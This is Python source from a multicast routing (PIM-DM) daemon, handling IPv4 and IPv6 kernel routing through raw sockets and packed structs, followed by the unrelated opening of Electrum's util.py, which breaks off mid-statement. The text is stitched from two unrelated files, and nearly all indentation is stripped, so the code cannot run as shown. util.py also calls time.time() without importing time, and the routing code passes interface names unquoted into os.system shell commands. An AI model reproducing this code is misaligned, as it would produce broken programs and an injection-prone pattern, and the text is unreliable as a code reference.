s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_IGMP)
# MRT TABLE
if pim_globals.MULTICAST_TABLE_ID != 0:
try:
s.setsockopt(socket.IPPROTO_IP, self.MRT_TABLE, pim_globals.MULTICAST_TABLE_ID)
except:
traceback.print_exc()
# MRT INIT
s.setsockopt(socket.IPPROTO_IP, self.MRT_INIT, 1)
# MRT PIM
s.setsockopt(socket.IPPROTO_IP, self.MRT_PIM, 0)
s.setsockopt(socket.IPPROTO_IP, self.MRT_ASSERT, 1)
super().__init__(s)
'''
Structure to create/remove virtual interfaces
struct vifctl {
vifi_t vifc_vifi; /* Index of VIF */
unsigned char vifc_flags; /* VIFF_ flags */
unsigned char vifc_threshold; /* ttl limit */
unsigned int vifc_rate_limit; /* Rate limiter values (NI) */
union {
struct in_addr vifc_lcl_addr; /* Local interface address */
int vifc_lcl_ifindex; /* Local interface index */
};
struct in_addr vifc_rmt_addr; /* IPIP tunnel addr */
};
'''
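    # Field-by-field, the pack format "HBBI 4s 4s" used below corresponds to vifctl:
    # vifc_vifi (H), vifc_flags (B), vifc_threshold (B), vifc_rate_limit (I),
    # vifc_lcl_addr (4s) and vifc_rmt_addr (4s). An illustrative call (the values are
    # an example only, not taken from this module):
    #   struct.pack("HBBI 4s 4s", 3, 0x0, 1, 0,
    #               socket.inet_aton("10.0.0.1"), socket.inet_aton("0.0.0.0"))
    # builds the payload that the MRT_ADD_VIF setsockopt expects for VIF index 3.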
def create_virtual_interface(self, ip_interface: str or bytes, interface_name: str, index, flags=0x0):
if type(ip_interface) is str:
ip_interface = socket.inet_aton(ip_interface)
struct_mrt_add_vif = struct.pack("HBBI 4s 4s", index, flags, 1, 0, ip_interface,
socket.inet_aton("0.0.0.0"))
os.system("ip mrule del iif {}".format(interface_name))
os.system("ip mrule del oif {}".format(interface_name))
if pim_globals.MULTICAST_TABLE_ID != 0:
os.system("ip mrule add iif {} lookup {}".format(interface_name, pim_globals.MULTICAST_TABLE_ID))
os.system("ip mrule add oif {} lookup {}".format(interface_name, pim_globals.MULTICAST_TABLE_ID))
with self.rwlock.genWlock():
self.socket.setsockopt(socket.IPPROTO_IP, self.MRT_ADD_VIF, struct_mrt_add_vif)
self.vif_index_to_name_dic[index] = interface_name
self.vif_name_to_index_dic[interface_name] = index
for source_dict in list(self.routing.values()):
for kernel_entry in list(source_dict.values()):
kernel_entry.new_interface(index)
self.interface_logger.debug('Create virtual interface: %s -> %d', interface_name, index)
return index
def remove_virtual_interface(self, interface_name):
#with self.interface_lock:
index = self.vif_name_to_index_dic.pop(interface_name, None)
struct_vifctl = struct.pack("HBBI 4s 4s", index, 0, 0, 0, socket.inet_aton("0.0.0.0"), socket.inet_aton("0.0.0.0"))
os.system("ip mrule del iif {}".format(interface_name))
os.system("ip mrule del oif {}".format(interface_name))
self.socket.setsockopt(socket.IPPROTO_IP, self.MRT_DEL_VIF, struct_vifctl)
        # interface_name was already removed from vif_name_to_index_dic above, so only
        # the index-to-name mapping still needs to be dropped here.
        interface_name = self.vif_index_to_name_dic.pop(index)
# change MFC's to not forward traffic by this interface (set OIL to 0 for this interface)
with self.rwlock.genWlock():
for source_dict in list(self.routing.values()):
for kernel_entry in list(source_dict.values()):
kernel_entry.remove_interface(index)
self.interface_logger.debug('Remove virtual interface: %s -> %d', interface_name, index)
'''
/* Cache manipulation structures for mrouted and PIMd */
struct mfcctl {
struct in_addr mfcc_origin; /* Origin of mcast */
struct in_addr mfcc_mcastgrp; /* Group in question */
vifi_t mfcc_parent; /* Where it arrived */
unsigned char mfcc_ttls[MAXVIFS]; /* Where it is going */
unsigned int mfcc_pkt_cnt; /* pkt count for src-grp */
unsigned int mfcc_byte_cnt;
unsigned int mfcc_wrong_if;
int mfcc_expire;
};
'''
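    # The pack format '"4s 4s H " + "B"*MAXVIFS + " IIIi"' used below mirrors mfcctl:
    # mfcc_origin (4s), mfcc_mcastgrp (4s), mfcc_parent (H), mfcc_ttls (32 x B), then
    # mfcc_pkt_cnt, mfcc_byte_cnt, mfcc_wrong_if (I I I) and mfcc_expire (i). Each byte
    # of mfcc_ttls is a per-VIF TTL threshold; a value of 0 disables forwarding on that
    # VIF, and set_flood_multicast_route() below packs 1 for every VIF except the inbound one.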
def set_multicast_route(self, kernel_entry: KernelEntry):
source_ip = socket.inet_aton(kernel_entry.source_ip)
group_ip = socket.inet_aton(kernel_entry.group_ip)
outbound_interfaces = kernel_entry.get_outbound_interfaces_indexes()
if len(outbound_interfaces) != Kernel.MAXVIFS:
raise Exception
#outbound_interfaces_and_other_parameters = list(kernel_entry.outbound_interfaces) + [0]*4
outbound_interfaces_and_other_parameters = outbound_interfaces + [0]*4
#outbound_interfaces, 0, 0, 0, 0 <- only works with python>=3.5
#struct_mfcctl = struct.pack("4s 4s H " + "B"*Kernel.MAXVIFS + " IIIi", source_ip, group_ip, inbound_interface_index, *outbound_interfaces, 0, 0, 0, 0)
struct_mfcctl = struct.pack("4s 4s H " + "B"*Kernel.MAXVIFS + " IIIi", source_ip, group_ip, kernel_entry.inbound_interface_index, *outbound_interfaces_and_other_parameters)
self.socket.setsockopt(socket.IPPROTO_IP, self.MRT_ADD_MFC, struct_mfcctl)
def set_flood_multicast_route(self, source_ip, group_ip, inbound_interface_index):
source_ip = socket.inet_aton(source_ip)
group_ip = socket.inet_aton(group_ip)
outbound_interfaces = [1]*self.MAXVIFS
outbound_interfaces[inbound_interface_index] = 0
#outbound_interfaces_and_other_parameters = list(kernel_entry.outbound_interfaces) + [0]*4
outbound_interfaces_and_other_parameters = outbound_interfaces + [0]*3 + [20]
#outbound_interfaces, 0, 0, 0, 0 <- only works with python>=3.5
#struct_mfcctl = struct.pack("4s 4s H " + "B"*Kernel.MAXVIFS + " IIIi", source_ip, group_ip, inbound_interface_index, *outbound_interfaces, 0, 0, 0, 0)
struct_mfcctl = struct.pack("4s 4s H " + "B"*Kernel.MAXVIFS + " IIIi", source_ip, group_ip, inbound_interface_index, *outbound_interfaces_and_other_parameters)
self.socket.setsockopt(socket.IPPROTO_IP, self.MRT_ADD_MFC, struct_mfcctl)
def remove_multicast_route(self, kernel_entry: KernelEntry):
source_ip = socket.inet_aton(kernel_entry.source_ip)
group_ip = socket.inet_aton(kernel_entry.group_ip)
outbound_interfaces_and_other_parameters = [0] + [0]*Kernel.MAXVIFS + [0]*4
struct_mfcctl = struct.pack("4s 4s H " + "B"*Kernel.MAXVIFS + " IIIi", source_ip, group_ip, *outbound_interfaces_and_other_parameters)
self.socket.setsockopt(socket.IPPROTO_IP, self.MRT_DEL_MFC, struct_mfcctl)
self.routing[kernel_entry.source_ip].pop(kernel_entry.group_ip)
if len(self.routing[kernel_entry.source_ip]) == 0:
self.routing.pop(kernel_entry.source_ip)
def exit(self):
self.running = False
# MRT DONE
self.socket.setsockopt(socket.IPPROTO_IP, self.MRT_DONE, 1)
self.socket.close()
'''
/* This is the format the mroute daemon expects to see IGMP control
* data. Magically happens to be like an IP packet as per the original
*/
struct igmpmsg {
__u32 unused1,unused2;
unsigned char im_msgtype; /* What is this */
unsigned char im_mbz; /* Must be zero */
unsigned char im_vif; /* Interface (this ought to be a vifi_t!) */
unsigned char unused3;
struct in_addr im_src,im_dst;
};
'''
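    # The 20 bytes read in handler() map onto igmpmsg via "II B B B B 4s 4s":
    # unused1/unused2 (I I), im_msgtype (B), im_mbz (B), im_vif (B), unused3 (B),
    # im_src (4s) and im_dst (4s). im_mbz must be zero in a valid upcall, which is
    # why the loop below skips any message where that field is non-zero.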
def handler(self):
while self.running:
try:
msg = self.socket.recv(20)
(_, _, im_msgtype, im_mbz, im_vif, _, im_src, im_dst) = struct.unpack("II B B B B 4s 4s", msg[:20])
print((im_msgtype, im_mbz, socket.inet_ntoa(im_src), socket.inet_ntoa(im_dst)))
if im_mbz != 0:
continue
print(im_msgtype)
print(im_mbz)
print(im_vif)
print(socket.inet_ntoa(im_src))
print(socket.inet_ntoa(im_dst))
#print((im_msgtype, im_mbz, socket.inet_ntoa(im_src), socket.inet_ntoa(im_dst)))
ip_src = socket.inet_ntoa(im_src)
ip_dst = socket.inet_ntoa(im_dst)
if im_msgtype == self.IGMPMSG_NOCACHE:
print("IGMP NO CACHE")
self.igmpmsg_nocache_handler(ip_src, ip_dst, im_vif)
elif im_msgtype == self.IGMPMSG_WRONGVIF:
print("WRONG VIF HANDLER")
self.igmpmsg_wrongvif_handler(ip_src, ip_dst, im_vif)
#elif im_msgtype == Kernel.IGMPMSG_WHOLEPKT:
# print("IGMP_WHOLEPKT")
# self.igmpmsg_wholepacket_handler(ip_src, ip_dst)
else:
raise Exception
except Exception:
traceback.print_exc()
continue
# receive multicast (S,G) packet and multicast routing table has no (S,G) entry
def igmpmsg_nocache_handler(self, ip_src, ip_dst, iif):
source_group_pair = (ip_src, ip_dst)
self.get_routing_entry(source_group_pair, create_if_not_existent=True).recv_data_msg(iif)
    # receive multicast (S,G) packet on an outbound interface
def igmpmsg_wrongvif_handler(self, ip_src, ip_dst, iif):
source_group_pair = (ip_src, ip_dst)
self.get_routing_entry(source_group_pair, create_if_not_existent=True).recv_data_msg(iif)
''' useless in PIM-DM... useful in PIM-SM
def igmpmsg_wholepacket_handler(self, ip_src, ip_dst):
#kernel_entry = self.routing[(ip_src, ip_dst)]
source_group_pair = (ip_src, ip_dst)
self.get_routing_entry(source_group_pair, create_if_not_existent=True).recv_data_msg()
#kernel_entry.recv_data_msg(iif)
'''
@staticmethod
def _get_kernel_entry_interface():
return KernelEntry4Interface
def _create_pim_interface_object(self, interface_name, index, state_refresh_capable):
return InterfacePim(interface_name, index, state_refresh_capable)
def _create_membership_interface_object(self, interface_name, index):
return InterfaceIGMP(interface_name, index)
class Kernel6(Kernel):
# MRT6
MRT6_BASE = 200
MRT6_INIT = (MRT6_BASE) # /* Activate the kernel mroute code */
MRT6_DONE = (MRT6_BASE + 1) # /* Shutdown the kernel mroute */
MRT6_ADD_MIF = (MRT6_BASE + 2) # /* Add a virtual interface */
MRT6_DEL_MIF = (MRT6_BASE + 3) # /* Delete a virtual interface */
MRT6_ADD_MFC = (MRT6_BASE + 4) # /* Add a multicast forwarding entry */
MRT6_DEL_MFC = (MRT6_BASE + 5) # /* Delete a multicast forwarding entry */
MRT6_VERSION = (MRT6_BASE + 6) # /* Get the kernel multicast version */
MRT6_ASSERT = (MRT6_BASE + 7) # /* Activate PIM assert mode */
MRT6_PIM = (MRT6_BASE + 8) # /* enable PIM code */
MRT6_TABLE = (MRT6_BASE + 9) # /* Specify mroute table ID */
MRT6_ADD_MFC_PROXY = (MRT6_BASE + 10) # /* Add a (*,*|G) mfc entry */
MRT6_DEL_MFC_PROXY = (MRT6_BASE + 11) # /* Del a (*,*|G) mfc entry */
MRT6_MAX = (MRT6_BASE + 11)
# define SIOCGETMIFCNT_IN6 SIOCPROTOPRIVATE /* IP protocol privates */
# define SIOCGETSGCNT_IN6 (SIOCPROTOPRIVATE+1)
# define SIOCGETRPF (SIOCPROTOPRIVATE+2)
# Max Number of Virtual Interfaces
MAXVIFS = 32
# SIGNAL MSG TYPE
MRT6MSG_NOCACHE = 1
MRT6MSG_WRONGMIF = 2
MRT6MSG_WHOLEPKT = 3 # /* used for use level encap */
# Interface flags
MIFF_REGISTER = 0x1 # /* register vif */
def __init__(self):
s = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_ICMPV6)
# MRT TABLE
if pim_globals.MULTICAST_TABLE_ID != 0:
try:
s.setsockopt(socket.IPPROTO_IPV6, self.MRT6_TABLE, pim_globals.MULTICAST_TABLE_ID)
except:
traceback.print_exc()
# MRT INIT
s.setsockopt(socket.IPPROTO_IPV6, self.MRT6_INIT, 1)
# MRT PIM
s.setsockopt(socket.IPPROTO_IPV6, self.MRT6_PIM, 0)
s.setsockopt(socket.IPPROTO_IPV6, self.MRT6_ASSERT, 1)
super().__init__(s)
'''
Structure to create/remove multicast interfaces
struct mif6ctl {
mifi_t mif6c_mifi; /* Index of MIF */
unsigned char mif6c_flags; /* MIFF_ flags */
unsigned char vifc_threshold; /* ttl limit */
__u16 mif6c_pifi; /* the index of the physical IF */
unsigned int vifc_rate_limit; /* Rate limiter values (NI) */
};
'''
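    # The pack format "HBBHI" used below matches mif6ctl: mif6c_mifi (H), mif6c_flags (B),
    # vifc_threshold (B), mif6c_pifi (H, the physical ifindex obtained from
    # if_nametoindex) and vifc_rate_limit (I).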
def create_virtual_interface(self, ip_interface, interface_name: str, index, flags=0x0):
physical_if_index = if_nametoindex(interface_name)
struct_mrt_add_vif = struct.pack("HBBHI", index, flags, 1, physical_if_index, 0)
os.system("ip -6 mrule del iif {}".format(interface_name))
os.system("ip -6 mrule del oif {}".format(interface_name))
if pim_globals.MULTICAST_TABLE_ID != 0:
os.system("ip -6 mrule add iif {} lookup {}".format(interface_name, pim_globals.MULTICAST_TABLE_ID))
os.system("ip -6 mrule add oif {} lookup {}".format(interface_name, pim_globals.MULTICAST_TABLE_ID))
with self.rwlock.genWlock():
self.socket.setsockopt(socket.IPPROTO_IPV6, self.MRT6_ADD_MIF, struct_mrt_add_vif)
self.vif_index_to_name_dic[index] = interface_name
self.vif_name_to_index_dic[interface_name] = index
for source_dict in list(self.routing.values()):
for kernel_entry in list(source_dict.values()):
kernel_entry.new_interface(index)
self.interface_logger.debug('Create virtual interface: %s -> %d', interface_name, index)
return index
def remove_virtual_interface(self, interface_name):
# with self.interface_lock:
mif_index = self.vif_name_to_index_dic.pop(interface_name, None)
interface_name = self.vif_index_to_name_dic.pop(mif_index)
physical_if_index = if_nametoindex(interface_name)
struct_vifctl = struct.pack("HBBHI", mif_index, 0, 0, physical_if_index, 0)
self.socket.setsockopt(socket.IPPROTO_IPV6, self.MRT6_DEL_MIF, struct_vifctl)
os.system("ip -6 mrule del iif {}".format(interface_name))
os.system("ip -6 mrule del oif {}".format(interface_name))
        # change MFC's to not forward traffic by this interface (set OIL to 0 for this interface)
with self.rwlock.genWlock():
for source_dict in list(self.routing.values()):
for kernel_entry in list(source_dict.values()):
kernel_entry.remove_interface(mif_index)
self.interface_logger.debug('Remove virtual interface: %s -> %d', interface_name, mif_index)
'''
/* Cache manipulation structures for mrouted and PIMd */
typedef __u32 if_mask;
typedef struct if_set {
if_mask ifs_bits[__KERNEL_DIV_ROUND_UP(IF_SETSIZE, NIFBITS)];
} if_set;
struct mf6cctl {
struct sockaddr_in6 mf6cc_origin; /* Origin of mcast */
struct sockaddr_in6 mf6cc_mcastgrp; /* Group in question */
mifi_t mf6cc_parent; /* Where it arrived */
struct if_set mf6cc_ifset; /* Where it is going */
};
'''
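    # The pack format '"28s 28s H " + "I" * 8' used below mirrors mf6cctl: two 28-byte
    # sockaddr_in6 structures (origin and group), the parent MIF index (H) and
    # mf6cc_ifset packed as eight 32-bit words, i.e. a 256-bit bitmap with one bit
    # per outgoing MIF.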
def set_multicast_route(self, kernel_entry: KernelEntry):
source_ip = socket.inet_pton(socket.AF_INET6, kernel_entry.source_ip)
sockaddr_in6_source = struct.pack("H H I 16s I", socket.AF_INET6, 0, 0, source_ip, 0)
group_ip = socket.inet_pton(socket.AF_INET6, kernel_entry.group_ip)
sockaddr_in6_group = struct.pack("H H I 16s I", socket.AF_INET6, 0, 0, group_ip, 0)
outbound_interfaces = kernel_entry.get_outbound_interfaces_indexes()
if len(outbound_interfaces) != 8:
raise Exception
# outbound_interfaces_and_other_parameters = list(kernel_entry.outbound_interfaces) + [0]*4
# outbound_interfaces_and_other_parameters = outbound_interfaces + [0]*4
outgoing_interface_list = outbound_interfaces
# outbound_interfaces, 0, 0, 0, 0 <- only works with python>=3.5
# struct_mfcctl = struct.pack("4s 4s H " + "B"*Kernel.MAXVIFS + " IIIi", source_ip, group_ip, inbound_interface_index, *outbound_interfaces, 0, 0, 0, 0)
struct_mf6cctl = struct.pack("28s 28s H " + "I" * 8, sockaddr_in6_source, sockaddr_in6_group,
kernel_entry.inbound_interface_index,
*outgoing_interface_list)
self.socket.setsockopt(socket.IPPROTO_IPV6, self.MRT6_ADD_MFC, struct_mf6cctl)
def set_flood_multicast_route(self, source_ip, group_ip, inbound_interface_index):
source_ip = socket.inet_pton(socket.AF_INET6, source_ip)
sockaddr_in6_source = struct.pack("H H I 16s I", socket.AF_INET6, 0, 0, source_ip, 0)
group_ip = socket.inet_pton(socket.AF_INET6, group_ip)
sockaddr_in6_group = struct.pack("H H I 16s I", socket.AF_INET6, 0, 0, group_ip, 0)
outbound_interfaces = [255] * 8
outbound_interfaces[inbound_interface_index // 32] = 0xFFFFFFFF & ~(1 << (inbound_interface_index % 32))
# outbound_interfaces, 0, 0, 0, 0 <- only works with python>=3.5
# struct_mfcctl = struct.pack("4s 4s H " + "B"*Kernel.MAXVIFS + " IIIi", source_ip, group_ip, inbound_interface_index, *outbound_interfaces, 0, 0, 0, 0)
# struct_mfcctl = struct.pack("4s 4s H " + "B"*Kernel.MAXVIFS + " IIIi", source_ip, group_ip, inbound_interface_index, *outbound_interfaces_and_other_parameters)
struct_mf6cctl = struct.pack("28s 28s H " + "I" * 8, sockaddr_in6_source, sockaddr_in6_group,
inbound_interface_index, *outbound_interfaces)
self.socket.setsockopt(socket.IPPROTO_IPV6, self.MRT6_ADD_MFC, struct_mf6cctl)
def remove_multicast_route(self, kernel_entry: KernelEntry):
source_ip = socket.inet_pton(socket.AF_INET6, kernel_entry.source_ip)
sockaddr_in6_source = struct.pack("H H I 16s I", socket.AF_INET6, 0, 0, source_ip, 0)
group_ip = socket.inet_pton(socket.AF_INET6, kernel_entry.group_ip)
sockaddr_in6_group = struct.pack("H H I 16s I", socket.AF_INET6, 0, 0, group_ip, 0)
outbound_interfaces = [0] * 8
# struct_mfcctl = struct.pack("4s 4s H " + "B"*Kernel.MAXVIFS + " IIIi", source_ip, group_ip, *outbound_interfaces_and_other_parameters)
struct_mf6cctl = struct.pack("28s 28s H " + "I" * 8, sockaddr_in6_source, sockaddr_in6_group, 0,
*outbound_interfaces)
self.socket.setsockopt(socket.IPPROTO_IPV6, self.MRT6_DEL_MFC, struct_mf6cctl)
self.routing[kernel_entry.source_ip].pop(kernel_entry.group_ip)
if len(self.routing[kernel_entry.source_ip]) == 0:
self.routing.pop(kernel_entry.source_ip)
def exit(self):
self.running = False
# MRT DONE
self.socket.setsockopt(socket.IPPROTO_IPV6, self.MRT6_DONE, 1)
self.socket.close()
'''
/*
* Structure used to communicate from kernel to multicast router.
     * We'll overlay the structure onto an MLD header (not an IPv6 header like igmpmsg{}
     * used for the IPv4 implementation). This is because this structure will be passed via an
     * IPv6 raw socket, on which an application will only receive the payload, i.e. the data after
     * the IPv6 header and all the extension headers. (See section 3 of RFC 3542)
*/
struct mrt6msg {
__u8 im6_mbz; /* must be zero */
__u8 im6_msgtype; /* what type of message */
__u16 im6_mif; /* mif rec'd on */
__u32 im6_pad; /* padding for 64 bit arch */
struct in6_addr im6_src, im6_dst;
};
/* ip6mr netlink cache report attributes */
enum {
IP6MRA_CREPORT_UNSPEC,
IP6MRA_CREPORT_MSGTYPE,
IP6MRA_CREPORT_MIF_ID,
IP6MRA_CREPORT_SRC_ADDR,
IP6MRA_CREPORT_DST_ADDR,
IP6MRA_CREPORT_PKT,
__IP6MRA_CREPORT_MAX
};
'''
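    # The 40 bytes consumed in handler() map onto mrt6msg via "B B H I 16s 16s":
    # im6_mbz (B), im6_msgtype (B), im6_mif (H), im6_pad (I), im6_src (16s) and
    # im6_dst (16s); as in the IPv4 case, messages with a non-zero im6_mbz are ignored.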
def handler(self):
while self.running:
try:
msg = self.socket.recv(500)
if len(msg) < 40:
continue
(im6_mbz, im6_msgtype, im6_mif, _, im6_src, im6_dst) = struct.unpack("B B H I 16s 16s", msg[:40])
# print((im_msgtype, im_mbz, socket.inet_ntoa(im_src), socket.inet_ntoa(im_dst)))
if im6_mbz != 0:
continue
print(im6_mbz)
print(im6_msgtype)
print(im6_mif)
print(socket.inet_ntop(socket.AF_INET6, im6_src))
print(socket.inet_ntop(socket.AF_INET6, im6_dst))
# print((im_msgtype, im_mbz, socket.inet_ntoa(im_src), socket.inet_ntoa(im_dst)))
ip_src = socket.inet_ntop(socket.AF_INET6, im6_src)
ip_dst = socket.inet_ntop(socket.AF_INET6, im6_dst)
if im6_msgtype == self.MRT6MSG_NOCACHE:
print("MRT6 NO CACHE")
self.msg_nocache_handler(ip_src, ip_dst, im6_mif)
elif im6_msgtype == self.MRT6MSG_WRONGMIF:
print("WRONG MIF HANDLER")
self.msg_wrongvif_handler(ip_src, ip_dst, im6_mif)
# elif im_msgtype == Kernel.IGMPMSG_WHOLEPKT:
# print("IGMP_WHOLEPKT")
# self.igmpmsg_wholepacket_handler(ip_src, ip_dst)
else:
raise Exception
except Exception:
traceback.print_exc()
continue
# receive multicast (S,G) packet and multicast routing table has no (S,G) entry
def msg_nocache_handler(self, ip_src, ip_dst, iif):
source_group_pair = (ip_src, ip_dst)
self.get_routing_entry(source_group_pair, create_if_not_existent=True).recv_data_msg(iif)
    # receive multicast (S,G) packet on an outbound interface
def msg_wrongvif_handler(self, ip_src, ip_dst, iif):
source_group_pair = (ip_src, ip_dst)
self.get_routing_entry(source_group_pair, create_if_not_existent=True).recv_data_msg(iif)
''' useless in PIM-DM... useful in PIM-SM
def msg_wholepacket_handler(self, ip_src, ip_dst):
#kernel_entry = self.routing[(ip_src, ip_dst)]
source_group_pair = (ip_src, ip_dst)
self.get_routing_entry(source_group_pair, create_if_not_existent=True).recv_data_msg()
#kernel_entry.recv_data_msg(iif)
'''
@staticmethod
def _get_kernel_entry_interface():
return KernelEntry6Interface
def _create_pim_interface_object(self, interface_name, index, state_refresh_capable):
return InterfacePim6(interface_name, index, state_refresh_capable)
def _create_membership_interface_object(self, interface_name, index):
return InterfaceMLD(interface_name, index)
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from datetime import datetime
import decimal
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'BTC':8, 'mBTC':5, 'bits':2, 'sat':0}
base_units_inverse = inv_dict(base_units)
base_units_list = ['BTC', 'mBTC', 'bits', 'sat'] # list(dict) does not guarantee order
def decimal_point_to_base_unit_name(dp: int) -> str:
# e.g. 8 -> "BTC"
try:
return base_units_inverse[dp]
except KeyError:
raise Exception('Unknown base unit')
def base_unit_name_to_decimal_point(unit_name: str) -> int:
# e.g. "BTC" -> 8
try:
return base_units[unit_name]
except KeyError:
raise Exception('Unknown base unit')
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
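# Illustrative examples (not from the original file): normalize_version() strips
# trailing ".0" components before splitting, so normalize_version("3.1.0") == [3, 1]
# while normalize_version("3.1.2") == [3, 1, 2]; "3.1" and "3.1.0" therefore compare equal.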
class NotEnoughFunds(Exception): pass
class NoDynamicFeeEstimates(Exception):
def __str__(self):
return _('Dynamic fee estimates not available')
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
class FileImportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to import from file.") + "\n" + self.message
class FileExportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to export to file.") + "\n" + self.message
class TimeoutException(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
if not self.message:
return _("Operation timed out.")
return self.message
class WalletFileException(Exception): pass
class BitcoinException(Exception): pass
# Throw this exception to unwind the stack, as when an error occurs;
# however, unlike other exceptions, the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class Satoshis(object):
def __new__(cls, value):
self = super(Satoshis, cls).__new__(cls)
self.value = value
return self
def __repr__(self):
return 'Satoshis(%d)'%self.value
def __str__(self):
return format_satoshis(self.value) + " BTC"
class Fiat(object):
def __new__(cls, value, ccy):
self = super(Fiat, cls).__new__(cls)
self.ccy = ccy
self.value = value
return self
def __repr__(self):
return 'Fiat(%s)'% self.__str__()
def __str__(self):
if self.value.is_nan():
return _('No Data')
else:
return "{:.2f}".format(self.value) + ' ' + self.ccy
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
if isinstance(obj, Satoshis):
return str(obj)
if isinstance(obj, Fiat):
return str(obj)
if isinstance(obj, Decimal):
return str(obj)
if isinstance(obj, datetime):
return obj.isoformat(' ')[:-3]
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
# only prints with --verbose flag
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_stderr(self, *msg):
print_stderr("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
# TODO: disable
is_verbose = True
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.__name__
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.electrum.electrum'
if not os.path.exists(d):
os.mkdir(d)
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_datadir_available(config_path):
path = config_path
if os.path.exists(path):
return
else:
raise FileNotFoundError(
